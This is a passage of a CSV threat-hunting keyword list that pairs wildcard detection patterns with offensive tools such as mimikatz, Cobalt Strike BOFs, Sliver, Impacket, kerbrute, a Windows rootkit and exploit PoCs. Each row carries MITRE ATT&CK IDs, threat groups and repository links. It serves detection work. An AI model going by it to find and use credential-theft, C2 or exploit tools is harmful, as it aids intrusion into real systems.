Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RogueSploit*","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/h0nus/RogueSploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*RogueWinRM dll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM exe.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rookuu/BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*Root backdoor obtained!*","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ 
(CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","N/A","N/A","1","21","5","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" +"*root/SecurityCenter2* -ClassName AntiVirusProduct*","greyware_tool_keyword","powershell","list AV products with powershell","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*root\cimv2:Win32_Implant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*root_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Rootkit.cpp*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*Rootkit.Win64.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword for ransomware","T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497","TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010","N/A","N/A","Ransomware","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*root-shellcode-linux*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rop.find_gadgets*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*RopChain.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*ROPEngine.cpp*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropfuscator *","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" 
+"*ROPfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropfuscator-*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropfuscator.*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropnop/go-windapsearch*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ropnop/kerbrute*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*rottenpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rottenpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RottenPotatoVulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*routerpasswords.com/*","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*routers_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RouterScan.exe*","greyware_tool_keyword","routerscan","Router Scan is able to find and identify a variety of devices from large number of known routers on your internal network","T1046 - T1083 - T1018 - T1116","TA0007 - TA0010 - TA0003","N/A","N/A","Network Exploitation tools","https://en.kali.tools/?p=244","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*routersploit*","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11407","2303","2023-05-22T21:50:32Z","2016-03-30T11:43:12Z" +"*rpc://* -rpc-mode ICPR -icpr-ca-name *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc::close*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::connect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::enum*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::server*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpcattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*rpcattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-backdoor.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-beacons.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 
- T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*rpcdump.py * | grep MS-RPRN*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*rpcdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*rpcdump_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*rpc-hijack.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary
emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*rpc-kill.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*rpcmap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*rpc-msf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*rpcrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*rpcrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*rpcrt4_new.dll*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation
tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z"
+"*rpcrt4_old.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z"
+"*rpc-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
